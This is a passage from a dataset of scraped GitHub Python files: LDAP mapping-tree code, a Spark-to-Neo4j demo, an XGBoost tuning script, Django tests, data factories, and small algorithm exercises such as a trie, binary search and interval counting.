)\n self.log.debug(\"delete: %s found by with %s\", ent.dn, filt)\n except NoSuchEntryError:\n raise ldap.NO_SUCH_OBJECT(\"mapping tree DN not found: %s\" %\n name)\n\n result = {}\n attrs = []\n if properties:\n #\n # build the list of attributes we are looking for\n\n for prop_name in properties:\n prop_attr = MT_PROPNAME_TO_ATTRNAME[prop_name]\n if not prop_attr:\n raise ValueError(\"Improper property name: %s \", prop_name)\n self.log.debug(\"Look for attr %s (property: %s)\",\n prop_attr, prop_name)\n attrs.append(prop_attr)\n\n # now look for each attribute from the MT entry\n for attr in ent.getAttrs():\n # given an attribute name retrieve the property name\n props = [k for k, v in MT_PROPNAME_TO_ATTRNAME.items()\n if v.lower() == attr.lower()]\n\n # If this attribute is present in the MT properties and was\n # requested, adds it to result.\n if len(props) > 0:\n if len(attrs) > 0:\n if MT_PROPNAME_TO_ATTRNAME[props[0]] in attrs:\n # if the properties was requested\n self.log.debug(\"keep only attribute %s \", props[0])\n result[props[0]] = ent.getValues(attr)\n else:\n result[props[0]] = ent.getValues(attr)\n return result\n\n def setProperties(self, suffix=None, bename=None, name=None,\n properties=None):\n raise NotImplementedError\n\n def toSuffix(self, entry=None, name=None):\n '''\n Return, for a given mapping tree entry, the suffix values.\n Suffix values are identical from a LDAP point of views.\n Suffix values may be surrounded by \", or containing '\\'\n escape characters.\n\n @param entry - LDAP entry of the mapping tree\n @param name - mapping tree DN\n\n @result list of values of suffix attribute (aka 'cn')\n\n @raise ldap.NO_SUCH_OBJECT - in name is invalid DN\n ValueError - entry does not contains the suffix attribute\n InvalidArgumentError - if both entry/name are missing\n '''\n attr_suffix = MT_PROPNAME_TO_ATTRNAME[MT_SUFFIX]\n if entry:\n if not entry.hasValue(attr_suffix):\n raise ValueError(\"Entry has no %s attribute %r\" %\n (attr_suffix, entry))\n return entry.getValues(attr_suffix)\n elif name:\n filt = \"(objectclass=%s)\" % MT_OBJECTCLASS_VALUE\n\n try:\n attrs = [attr_suffix]\n ent = self.conn.getEntry(name, ldap.SCOPE_BASE, filt, attrs)\n self.log.debug(\"toSuffix: %s found by its DN\", ent.dn)\n except NoSuchEntryError:\n raise ldap.NO_SUCH_OBJECT(\"mapping tree DN not found: %s\" %\n name)\n\n if not ent.hasValue(attr_suffix):\n raise ValueError(\"Entry has no %s attribute %r\" %\n (attr_suffix, ent))\n return 
ent.getValues(attr_suffix)\n else:\n raise InvalidArgumentError(\"entry or name are mandatory\")\n\n\nclass MappingTree(DSLdapObject):\n \"\"\"Mapping tree DSLdapObject with:\n - must attributes = ['cn']\n - RDN attribute is 'cn'\n\n :param instance: An instance\n :type instance: lib389.DirSrv\n :param dn: Entry DN\n :type dn: str\n \"\"\"\n\n _must_attributes = ['cn']\n\n def __init__(self, instance, dn=None):\n super(MappingTree, self).__init__(instance, dn)\n self._rdn_attribute = 'cn'\n self._must_attributes = ['cn']\n self._create_objectclasses = ['top', 'extensibleObject', 'nsMappingTree']\n self._protected = False\n\n def set_parent(self, parent):\n \"\"\"\n Set the parent suffix to create a tree of backends. For example:\n\n be_1 = bes.create(properties={...})\n be_2 = bes.create(properties={...})\n mt = be_2.get_mapping_tree()\n mt.set_parent(be_1.get_attr_val_bytes('nsslapd-suffix'))\n\n :param parent: The parent suffix above this mapping tree.\n :type parent: str\n \"\"\"\n self.replace('nsslapd-parent-suffix', parent)\n\n\nclass MappingTrees(DSLdapObjects):\n \"\"\"DSLdapObjects that represents Mapping trees\n\n :param instance: An instance\n :type instance: lib389.DirSrv\n \"\"\"\n\n def __init__(self, instance):\n super(MappingTrees, self).__init__(instance=instance)\n self._objectclasses = ['nsMappingTree']\n self._filterattrs = ['cn', 'nsslapd-backend']\n self._childobject = MappingTree\n self._basedn = DN_MAPPING_TREE\n\n def get_root_suffix_by_entry(self, entry_dn):\n \"\"\"Get the root suffix to which the entry belongs\n\n :param entry_dn: An entry DN\n :type entry_dn: str\n :returns: str\n \"\"\"\n\n mapping_tree_list = sorted(self.list(), key=lambda b: len(b.dn), reverse=True)\n\n entry_dn_parts = str2dn(entry_dn)\n processing = True\n while processing:\n compare_dn = dn2str(entry_dn_parts)\n for mapping_tree in mapping_tree_list:\n if str.lower(compare_dn) == str.lower(mapping_tree.rdn):\n processing = False\n return mapping_tree.rdn\n if entry_dn_parts:\n entry_dn_parts.pop(0)\n else:\n processing = False\n raise ldap.NO_SUCH_OBJECT(f\"{entry_dn} doesn't belong to any suffix\")\n\n def get(self, selector=[], dn=None, json=False):\n \"\"\"Create a test user with uid=test_user_UID rdn\n\n :param uid: User id\n :type uid: int\n :param gid: Group id\n :type gid: int\n\n :returns: DSLdapObject of the created entry\n \"\"\"\n\n # Normalise escaped characters\n if is_dn(selector):\n selector = dn2str(str2dn(selector))\n\n return super(MappingTrees, self).get(selector, dn, json)\n","repo_name":"389ds/389-ds-base","sub_path":"src/lib389/lib389/mappingTree.py","file_name":"mappingTree.py","file_ext":"py","file_size_in_byte":16963,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"31"} +{"seq_id":"3831260075","text":"from pyspark.sql import SparkSession\nfrom neo4j import GraphDatabase\nfrom pyspark.sql import Row\n\nURI = \"neo4j://localhost:11003\"\nAUTH = (\"neo4j\", \"Ne04j!\")\n\ndef merge_nodes_batchmode(tx, dict_list):\n query = (\n \"\"\"CALL apoc.periodic.iterate(\n 'WITH $batch AS batch UNWIND batch AS bb RETURN bb',\n '\n MERGE (p:Person {name:bb.Name,birth:bb.BirthDate,gender:bb.Gender,salary:bb.Salary})\n ',\n {batchSize: 1000, parallel:true, concurrency:16, retries:5, params: {batch: $batch}}\n )\n \"\"\"\n )\n result = tx.run(query, batch=dict_list)\n\ndef merge_nodes_one_batch(tx, dict_list):\n query = (\n \"\"\"\n WITH $batch AS batch UNWIND batch AS bb \n MERGE (p:Person 
{name:bb.Name,birth:bb.BirthDate,gender:bb.Gender,salary:bb.Salary})\n    \"\"\"\n    )\n    result = tx.run(query, batch=dict_list)\n\ndef create_dict(df):\n    data_collect = df.collect()\n    my_dict=[]\n    i=0\n    # looping through each row of the dataframe\n    for row in data_collect:\n        row2 = Row(Name=row[\"Name\"], BirthDate=row[\"BirthDate\"],Gender=row[\"Gender\"],Salary=row[\"Salary\"])\n        row3=row2.asDict()\n        my_dict.append(row3)\n        i +=1\n    print(my_dict)\n    return my_dict\n\n# Create a spark session\nspark = SparkSession.builder.appName('DF_to_dict').getOrCreate()\n\n# Create data in dataframe\ndata = [(('Ram'), '1991-04-01', 'M', 3000),\n        (('Mike'), '2000-05-19', 'M', 4000),\n        (('Rohini'), '1978-09-05', 'M', 4000),\n        (('Maria'), '1967-12-01', 'F', 4000),\n        (('Jenis'), '1980-02-17', 'F', 1200)]\n\ncolumns = [\"Name\", \"BirthDate\", \"Gender\", \"Salary\"]\ndf = spark.createDataFrame(data=data,\n                           schema=columns)\nbatch_dict=create_dict(df)\n\n# open the session once with the target database instead of shadowing the\n# context-managed session with a second, never-closed one\nwith GraphDatabase.driver(URI, auth=AUTH) as driver:\n    with driver.session(database='neo4j') as session:\n        session.write_transaction(merge_nodes_batchmode, batch_dict)\n\n\n","repo_name":"ichbintonywu/spark2neo4j","sub_path":"neo4jdemo_df2dictList_merge.py","file_name":"neo4jdemo_df2dictList_merge.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8597800196","text":"from xgboost import XGBClassifier\r\nfrom sklearn.datasets import load_svmlight_file\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom itertools import product\r\nimport warnings\r\n\r\nwarnings.filterwarnings('ignore')\r\n\r\n# Load data into test and train\r\nx_test, y_test = load_svmlight_file(\"a9a.t\")\r\nx_train, y_train = load_svmlight_file(\"a9a.txt\")\r\n\r\n# Fit model based on training data, use default values for ease of understanding\r\ndata_model = XGBClassifier()\r\ndata_model.fit(x_train, y_train)\r\nprint(\"Default values for XGBoost hyperparameters : \\n \", data_model)\r\n\r\n# Predictions for test data\r\ny_prediction = data_model.predict(x_test)\r\nall_predictions = [round(val) for val in y_prediction]\r\n\r\n# Run predictions and calculate accuracy\r\nacc = accuracy_score(y_test, all_predictions)\r\nprint(\"\\n Accuracy: %.2f%%\" % (acc * 100))\r\n\r\n# Tune hyperparameters, make list for all values and obtain all possible combinations (long process)\r\nmax_depth = [3, 4, 5]\r\nlearning_rate = [0.05, 0.1, 0.2]\r\nmissing = [None, 0]\r\nn_estimators = [100, 200, 300]\r\nreg_lambda = [0.0, 1.0]\r\nobjective = ['binary:logistic', 'binary:logitraw', 'binary:hinge']\r\n\r\nhyperparameters = []\r\nfor depth, rate, miss, n_estimate, lam, obj in product(max_depth, learning_rate,\r\n                                                       missing, n_estimators,\r\n                                                       reg_lambda, objective):\r\n    hyperparameters.append([depth, rate, miss, n_estimate, lam, obj])\r\n\r\nbest_acc = 0\r\n\r\n# Run through the list of all parameters and find data model with best acc\r\nfor parameter in hyperparameters:\r\n    parameters = {'max_depth': parameter[0], 'learning_rate': parameter[1],\r\n                  'missing': parameter[2], 'n_estimators': parameter[3],\r\n                  'reg_lambda': parameter[4], 'objective': parameter[5]}\r\n\r\n    data_model = XGBClassifier(max_depth=parameter[0], learning_rate=parameter[1],\r\n                               missing=parameter[2], n_estimators=parameter[3],\r\n                               reg_lambda=parameter[4], 
objective=parameter[5])\r\n\r\n    kfold = KFold()\r\n    cross_val_scores = cross_val_score(data_model, x_train, y_train, cv=kfold)\r\n    accuracy = cross_val_scores.mean() * 100\r\n\r\n    #Check for best accuracy\r\n    if best_acc < accuracy:\r\n        best_acc = accuracy\r\n        best_model = parameters\r\n\r\nprint(\"\\n Best accuracy : \", best_acc)\r\nprint(\"\\n The model with best accuracy : \", best_model)\r\n\r\nprint(\"\\nCross Validation Error Rate for the best model: \", 1 - best_acc / 100)\r\n\r\n# best_model is a plain dict of hyperparameters, not a fitted estimator, so\r\n# refit a classifier with those parameters before scoring on the test set\r\nbest_clf = XGBClassifier(**best_model)\r\nbest_clf.fit(x_train, y_train)\r\nprint(\"\\nTest Error Rate for the best model: \", 1 - best_clf.score(x_test, y_test))\r\n","repo_name":"kvk5777/448-Program","sub_path":"Problem5BoostedDecisionTrees.py","file_name":"Problem5BoostedDecisionTrees.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24417808468","text":"import pytest\n\nfrom django.urls import reverse\nfrom django.utils import timezone as tz\n\nfrom music.models import Artist\nfrom radio.models import Radio, Play\n\n\n@pytest.fixture\ndef radio_data():\n    radio = Radio.objects.create(name=\"Radio One\", slug=\"radio-one\")\n\n    artist = Artist.objects.create(name=\"Gang of four\", slug=\"gang-of-four\")\n\n    common = {\"radio\": radio, \"artist\": artist}\n    first = Play.objects.create(title=\"Foo\", artist_name=\"Gang of four\", **common)\n    Play.objects.create(title=\"Bar\", artist_name=\"Gang of four\", **common)\n    last = Play.objects.create(title=\"Baz\", artist_name=\"Gang of four\", **common)\n\n    radio.first_play = first\n    radio.last_play = last\n    radio.play_count = 3\n    radio.save()\n\n    return radio\n\n\n@pytest.mark.django_db\ndef test_index_view(client, radio_data):\n    date = tz.now()\n\n    response = client.get(reverse('ui:index'))\n    assert response.status_code == 200\n\n    content = str(response.content)\n    assert '
    Radio One
    ' in content\n    assert '3 plays' in content\n    assert 'since {:%d.%m.%Y}'.format(date) in content\n    assert 'Baz' in content\n    assert 'Gang of four' in content\n\n\n@pytest.mark.django_db\ndef test_stats_views(client, radio_data):\n\n    response = client.get(reverse('radio:stats'))\n    assert response.status_code == 200\n\n    response = client.get(reverse('radio:stats', args=[\"radio-one\"]))\n    assert response.status_code == 200\n\n\n@pytest.mark.django_db\ndef test_plays_view(client, radio_data):\n    response = client.get(reverse('radio:plays'))\n    assert response.status_code == 200\n\n    content = str(response.content)\n    assert \"Foo\" in content\n    assert \"Bar\" in content\n    assert \"Baz\" in content\n    assert \"Gang of four\" in content\n","repo_name":"ihabunek/radioscraper","sub_path":"radio/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"31"} +{"seq_id":"15158306607","text":"import factory\nimport factory.fuzzy\nfrom spotipy2.types import Album\n\nfrom .artist_factory import ArtistFactory\n\n\nclass AlbumFactory(factory.Factory):\n    album_type = factory.Faker(\"sentence\")\n    available_markets = factory.Faker(\"country_code\")\n    artists = factory.List([factory.SubFactory(ArtistFactory) for _ in range(3)])\n    copyrights = factory.Faker(\"sentence\")\n    external_ids = factory.Dict({\"spotify\": factory.Faker(\"uuid4\")})\n    external_urls = factory.Dict({\"spotify\": factory.Faker(\"uri\")})\n    genres = factory.Faker(\"music_subgenre\")\n    href = factory.Faker(\"uri\")\n    id = factory.Faker(\"lexify\", text=\"??????????????????????\")\n    images = factory.List(\n        [\n            factory.Dict(\n                {\n                    \"href\": factory.Faker(\"uri\"),\n                    \"height\": factory.Faker(\"random_int\"),\n                    \"width\": factory.Faker(\"random_int\"),\n                }\n            )\n        ]\n    )\n    label = factory.Faker(\"random_number\")\n    name = factory.Faker(\"name\")\n    popularity = factory.Faker(\"random_number\")\n    release_date = factory.Faker(\"date\")\n    release_date_precision = factory.fuzzy.FuzzyChoice((\"year\", \"month\", \"date\"))\n    restrictions = factory.Dict(\n        {\"reason\": factory.fuzzy.FuzzyChoice((\"market\", \"product\", \"explicit\"))}\n    )\n    tracks = []\n    type = \"album\"\n    uri = factory.Sequence(lambda n: f\"spotify:album:{n}\")\n\n    class Meta:\n        model = Album\n        inline_args = (\n            \"album_type\",\n            \"artists\",\n            \"available_markets\",\n            \"copyrights\",\n            \"external_ids\",\n            \"external_urls\",\n            \"genres\",\n            \"href\",\n            \"id\",\n            \"images\",\n            \"label\",\n            \"name\",\n            \"popularity\",\n            \"release_date\",\n            \"release_date_precision\",\n            \"restrictions\",\n            \"tracks\",\n            \"type\",\n            \"uri\",\n        )\n","repo_name":"phucnt1992/PersonaCode","sub_path":"services/django/tests/factories/album_factory.py","file_name":"album_factory.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32321711899","text":"# coding: utf-8\n\nclass Solution:\n    # @param airplanes, a list of Interval\n    # @return an integer\n    def countOfAirplanes(self, airplanes):\n        # write your code here\n        '''\n        Take the data [[1, 10], [2, 3], [5, 8], [4, 7]] as an example\n        1. The dict air_status records one plane being added or removed at a given moment: 1 means one more, -1 means one fewer.\n          - a[1], a[2], a[5], a[4] = 1\n          - a[10], a[3], a[8], a[7] = -1\n        2. Put all the moments together and sort them: [1, 2, 3, 4, 5, 7, 8, 10]\n        3. 
Traverse the result of step 2, adding or subtracting the plane count according to the dict\n        '''\n        ret = 0\n        air_status = {}\n        for air in airplanes:\n            if air.start not in air_status:\n                air_status[air.start] = 1\n            else:\n                air_status[air.start] += 1\n            if air.end not in air_status:\n                air_status[air.end] = -1\n            else:\n                air_status[air.end] -= 1\n        time_order = []\n        for key in air_status: # unlike C++, Python has no built-in ordered set\n            time_order.append(key)\n        time_order.sort()\n        airs = 0\n        for t in time_order:\n            airs += air_status[t]\n            ret = max(airs, ret)\n        return ret\n\n# medium: http://lintcode.com/zh-cn/problem/number-of-airplanes-in-the-sky/\n","repo_name":"yingl/LintCodeInPython","sub_path":"number-of-airplanes-in-the-sky.py","file_name":"number-of-airplanes-in-the-sky.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"31"} +{"seq_id":"177766636","text":"class TrieNode:\n    def __init__(self, char):\n\n        self.char = char\n        self.is_word = False\n        self.children = {}\n\n\nclass Trie:\n    def __init__(self):\n        self.root = TrieNode(\"\")\n\n    def insert(self, word):\n\n        node = self.root\n\n        for char in word:\n            if char in node.children:\n                node = node.children[char]\n            else:\n                new_node = TrieNode(char)\n                node.children[char] = new_node\n                node = new_node\n\n        node.is_word = True\n\n    def delete(self, word):\n        node = self.root\n\n        for char in word[:-1]:\n            if char in node.children:\n                node = node.children[char]\n            else:\n                return False\n\n        if word[-1] in node.children:\n            del node.children[word[-1]]\n            return True\n        else:\n            return False\n\n    def dfs(self, node, prefix):\n        if node.is_word:\n            self.output.append(prefix + node.char)\n\n        for child in node.children.values():\n            self.dfs(child, prefix + node.char)\n\n    def query(self, x):\n\n        self.output = []\n        node = self.root\n\n        for char in x:\n            if char in node.children:\n                node = node.children[char]\n            else:\n                return []\n\n        self.dfs(node, x[:-1])\n\n        # to be stored in alphabetical order\n        return sorted(self.output)\n","repo_name":"vkumar825/contact-book","sub_path":"src/trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73239292568","text":"from cortexmulator.cortexm0lator import CortexM0lator\n\n\nm = CortexM0lator()\n# m.read_hex_data('/mnt/c/Users/konia/Developer/arm_emulator/c_files/b.hex')\n# m.read_hex_data('/Users/Konrad/Developer/Python/arm_emulator/c_files/a.hex')\nm.read_hex_data('./c_files/b.hex')\n\n# print(m.read_memory(0x0000))\n# print(m.read_register('r10'))\n# m.memory.write_register('r10', 0xfafa)\n# print(hex(m.read_register('r10')))\nm.run()\n# print(m.memory._memory)\n","repo_name":"KG5321/arm_emulator","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"7917644455","text":"import csv\nimport datetime\nimport re\nimport json\nimport icalendar\nimport io\nfrom flask import current_app, escape, make_response\nimport pytz\nimport types\n\ndef time_print(pgdt, fmt):\n    \"\"\" Collect local time zone based printing in one place, expects one of our timezoneless UTC based times from postgres \"\"\"\n    tz = pytz.timezone(current_app.config['UI_TIME_ZONE'])\n    return pgdt.astimezone(datetime.timezone.utc).astimezone(tz).strftime(fmt)\n\n\nclass JSONEncoderX(json.JSONEncoder):\n    \"\"\" Helper for some special cases \"\"\"\n    def default(self, o):\n        if hasattr(o, 'getAsDict'):\n            return 
o.getAsDict()\n if isinstance(o, (set, types.GeneratorType)):\n return list(o)\n else:\n return str(o)\n\ndef to_json(obj):\n return JSONEncoderX().encode(obj)\n\ndef json_encode(data):\n response = make_response(to_json(data))\n response.headers['Content-type'] = 'application/json'\n return response\n\ndef ical_encode(data):\n response = make_response(ICalEncoder().encodeevents(data))\n response.headers['Content-type'] = 'text/calendar'\n return response\n\ndef csv_encode(filename, fields, data):\n buf = io.StringIO()\n csvw = csv.DictWriter(buf, fields, extrasaction='ignore')\n csvw.writeheader()\n csvw.writerows(data)\n response = make_response(buf.getvalue())\n response.headers[\"Content-Disposition\"] = \"attachment; filename={}.csv\".format(filename)\n response.headers[\"Content-Type\"] = \"text/csv\"\n return response\n\nclass ICalEncoder():\n def encodeevents(self, data):\n cal = icalendar.Calendar()\n cal.add('prodid', '-//Scorekeeper Registration')\n cal.add('version', '2.0')\n cal.add('x-wr-calname;value=text', 'Scorekeeper Registration')\n cal.add('method', 'publish');\n for date, events in sorted(data.items()):\n for (series, name), reglist in sorted(events.items()):\n codes = [reg.classcode for reg in reglist]\n event = icalendar.Event()\n event.add('summary', \"%s: %s\" % (name, ','.join(codes)))\n event.add('dtstart', date)\n event['uid'] = 'SCOREKEEPER-CALENDAR-%s-%s' % (re.sub(r'\\W','', name), date)\n cal.add_component(event)\n return cal.to_ical()\n\n\n","repo_name":"drytoastman/scorekeeperbackend","sub_path":"web/nwrsc/lib/encoding.py","file_name":"encoding.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"30672655817","text":"# create a class programmer for storing info of\r\n# few programmers working at microsoft\r\n\r\nclass Programmer:\r\n company = \"Microsoft\"\r\n \r\n def __init__(self,name,product):\r\n self.name = name\r\n self.product = product\r\n \r\n def getInfo(self):\r\n print(f\"Company Name is {self.company}\")\r\n print(f\"Programmer name is {self.name}\")\r\n print(f\"He/She working on {self.product}\") \r\n\r\n\r\nmrd = Programmer(\"Mahadi Rahman Dhrubo\",\"Software Engineer\")\r\nmrd.getInfo()\r\n\r\nprint(\"\\n\")\r\n\r\nsrs = Programmer(\"Sadia Rahman Shanta\",\"UI/UX Designer\")\r\nsrs.getInfo()\r\n\r\n","repo_name":"MahadiRahman262523/Python_Code_Part-1","sub_path":"practice_problem-1.py","file_name":"practice_problem-1.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17544237163","text":"from test1.models import Questions, MLdata\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\nimport pickle\r\nimport scipy\r\n\r\n##Step 1: Read CSV File\r\n#df = pd.read_csv(\"test1/MachinelearningAlgorithms/MachineLearningDataSet.csv\", encoding='cp1252')\r\n#print(df.columns)\r\n\r\n#features = ['index','title','slug','author','updated_on','body','created_on','status','tags','views','answers','upvotes','downvotes','isanswered','isclosed']\r\ndef combine_features(row):\r\n\treturn str(row['index']) + \" \" + row['title'] + \" \" + row['slug'] + \" \" + row[\"author\"] + \" \" + str(row[\"updated_on\"]) + \" \" + str(row['body']) + \" \" + str(row['created_on']) + \" \" + str(row[\"status\"]) + \" \" + row[\"tags\"] + \" \" + 
str(row['views']) + \" \" + str(row['answers']) + \" \" + str(row[\"upvotes\"]) + \" \" + str(row[\"downvotes\"]) + \" \" + str(row[\"isanswered\"]) + \" \" + str(row['isclosed'])\r\n#df[\"combined_features\"] = df.apply(combine_features,axis=1)\r\n#print(\"Combined Features:\", df[\"combined_features\"].head())\r\n#cv = CountVectorizer()\r\n#count_matrix = cv.fit_transform(df[\"combined_features\"])\r\n#pickle.dump(count_matrix, open('test1/MachineLearningAlgorithms/Trained_AI_Model.sav', 'wb'))\r\n\r\n\r\ndef RetrainModel():\r\n loaded_model = pickle.load(open('test1/MachineLearningAlgorithms/Trained_AI_Model.sav', 'rb'))\r\n df2 = pd.read_csv(\"test1/MachineLearningAlgorithms/MachineLearningDataSet2.csv\", encoding='cp1252')\r\n df2[\"combined_features\"] = df2.apply(combine_features,axis=1)\r\n if loaded_model is None:\r\n\t temp_model = loaded_model\r\n else:\r\n cv = CountVectorizer()\r\n prd = cv.fit_transform(df2[\"combined_features\"])\r\n print(prd.shape)\r\n print(loaded_model.shape)\r\n diff_n_rows = loaded_model.shape[0] - prd.shape[0]\r\n prd_new = scipy.sparse.vstack((prd, scipy.sparse.csr_matrix ((diff_n_rows,(prd.shape[1])))))\r\n temp_model_one = scipy.sparse.hstack((loaded_model, prd_new))\r\n diff_n_rows2 = temp_model_one.shape[1] - prd.shape[1]\r\n prd_new_left = scipy.sparse.hstack((prd, scipy.sparse.csr_matrix (((prd.shape[0]),diff_n_rows2))))\r\n temp_model = scipy.sparse.vstack((prd_new_left, temp_model_one))\r\n print(temp_model.shape)\r\n pickle.dump(temp_model, open('test1/MachineLearningAlgorithms/Trained_AI_Model.sav', 'wb'))\r\n return True\r\n\r\ndef InitialLoad(question_index):\r\n question_ids = []\r\n loaded_model = pickle.load(open('test1/MachineLearningAlgorithms/Trained_AI_Model.sav', 'rb'))\r\n print(loaded_model.shape)\r\n cosine_sim = cosine_similarity(loaded_model)\r\n similar_questions = list(enumerate(cosine_sim[question_index]))\r\n sorted_similar_questions = sorted(similar_questions, key=lambda x: x[1], reverse=True)\r\n for element in sorted_similar_questions:\r\n question_ids.append(get_index_from_id(element[0]))\r\n return question_ids\r\n\r\n\r\ndef get_index_from_id(id):\r\n mldata = MLdata.objects.filter(ML_id = id)\r\n return mldata[0].index","repo_name":"chandusanjith/Abendv2","sub_path":"main/MachineLearningAlgorithms/TrainAI.py","file_name":"TrainAI.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"25582769539","text":"# List to be in sorted order\n# Example of Divide and Conquer\ndef binarySearch(list,n):\n\tfirst = 0\n\tlast = len(list)-1\n\tfound = False\n\n\twhile first<=last and not found:\n\t\tmp = (first+last)//2\n\t\tif list[mp] == n:\n\t\t\tfound =True\n\t\telse:\n\t\t\tif n < list[mp]:\n\t\t\t\tlast = mp-1\n\t\t\telse:\n\t\t\t\tfirst = mp+1\n\treturn found\n\nlist = [1, 4, 6, 10, 15, 17, 20]\nprint(binarySearch(list,15)) # True\nprint(binarySearch(list, 2)) # False","repo_name":"Sbk3824/Algorithms-","sub_path":"binarySearch.py","file_name":"binarySearch.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21716179770","text":"import os\n\nimport numpy as np\nimport pytest\n\nfrom dgp.annotations.bounding_box_2d_annotation import (\n BoundingBox2DAnnotationList,\n)\nfrom dgp.datasets.synchronized_dataset import SynchronizedSceneDataset\nfrom dgp.utils.structures.bounding_box_2d import BoundingBox2D\nfrom tests import 
TEST_DATA_DIR\nfrom tests.annotation.test_ontology import get_ontology\n\n\n@pytest.fixture\ndef bb_ontology():\n DGP_TEST_DATASET_DIR = os.path.join(TEST_DATA_DIR, \"dgp\")\n scenes_dataset_json = os.path.join(DGP_TEST_DATASET_DIR, \"test_scene\", \"scene_dataset_v1.0.json\")\n return get_ontology(scene_dataset_json=scenes_dataset_json, annotation_type=\"bounding_box_3d\")\n\n\ndef test_bb2d_annotation(bb_ontology):\n bounding_boxes = [BoundingBox2D(box=np.float32([i, i + 5, i, i + 5])) for i in range(5)]\n annotation_list = BoundingBox2DAnnotationList(bb_ontology, bounding_boxes)\n assert len(annotation_list.ltrb) == 5\n\n\ndef test_bb2d_load(bb_ontology):\n DGP_TEST_DATASET_DIR = os.path.join(TEST_DATA_DIR, \"dgp\")\n expected_output = [[0., 581., 185., 652.], [149., 564., 299., 641.], [313., 573., 425., 627.],\n [1334., 531., 1655., 745.], [1559., 577., 1850., 726.], [717., 367., 1494., 1021.],\n [1232., 516., 1460., 681.], [1218., 553., 1362., 656.], [1199., 562., 1324., 643.],\n [1185., 555., 1292., 645.], [1175., 564., 1264., 633.], [1158., 549., 1232., 607.],\n [317., 556., 490., 652.], [196., 538., 395., 642.], [551., 525., 722., 610.],\n [831., 550., 917., 611.], [1213., 553., 1268., 595.], [493., 563., 654., 640.],\n [1470., 569., 1684., 700.], [396., 569., 502., 604.], [323., 569., 429., 602.],\n [289., 568., 393., 601.], [264., 568., 367., 601.], [533., 574., 547., 608.]]\n scenes_dataset_json = os.path.join(\n DGP_TEST_DATASET_DIR, \"test_scene/scene_01/bounding_box_2d/CAMERA_01/15569195938203752.json\"\n )\n bb2d_list = BoundingBox2DAnnotationList.load(scenes_dataset_json, bb_ontology)\n assert (bb2d_list.ltrb == expected_output).all()\n\n\ndef test_bb2d_proto(bb_ontology):\n DGP_TEST_DATASET_DIR = os.path.join(TEST_DATA_DIR, \"dgp\")\n scenes_dataset_json = os.path.join(\n DGP_TEST_DATASET_DIR, \"test_scene/scene_01/bounding_box_2d/CAMERA_01/15569195938203752.json\"\n )\n bb2d_list = BoundingBox2DAnnotationList.load(scenes_dataset_json, bb_ontology)\n ouput_proto = bb2d_list.to_proto()\n assert ouput_proto.__sizeof__() == 80\n\n\ndef test_bb2d_save(bb_ontology):\n DGP_TEST_DATASET_DIR = os.path.join(TEST_DATA_DIR, \"dgp\")\n scenes_dataset_json = os.path.join(\n DGP_TEST_DATASET_DIR, \"test_scene/scene_01/bounding_box_2d/CAMERA_01/15569195938203752.json\"\n )\n bb2d_list = BoundingBox2DAnnotationList.load(scenes_dataset_json, bb_ontology)\n bb2d_list.save(\".\")\n filepath = \"./219f294449ae6c01f62b6fa1d68949ee2b51ebd8.json\"\n assert os.path.exists(filepath)\n os.remove(filepath)\n","repo_name":"TRI-ML/dgp","sub_path":"tests/annotation/test_bounding_box_2d_annotation.py","file_name":"test_bounding_box_2d_annotation.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"31"} +{"seq_id":"70302160088","text":"\"\"\"\nGiven an array nums containing n distinct numbers in the range [0, n], return the only number in the range that is missing from the array.\n\nFollow up: Could you implement a solution using only O(1) extra space complexity and O(n) runtime complexity?\n\"\"\"\nclass Solution(object):\n def missingNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n ans = 0\n for i, a in enumerate(nums):\n ans += a - i\n return len(nums) - 
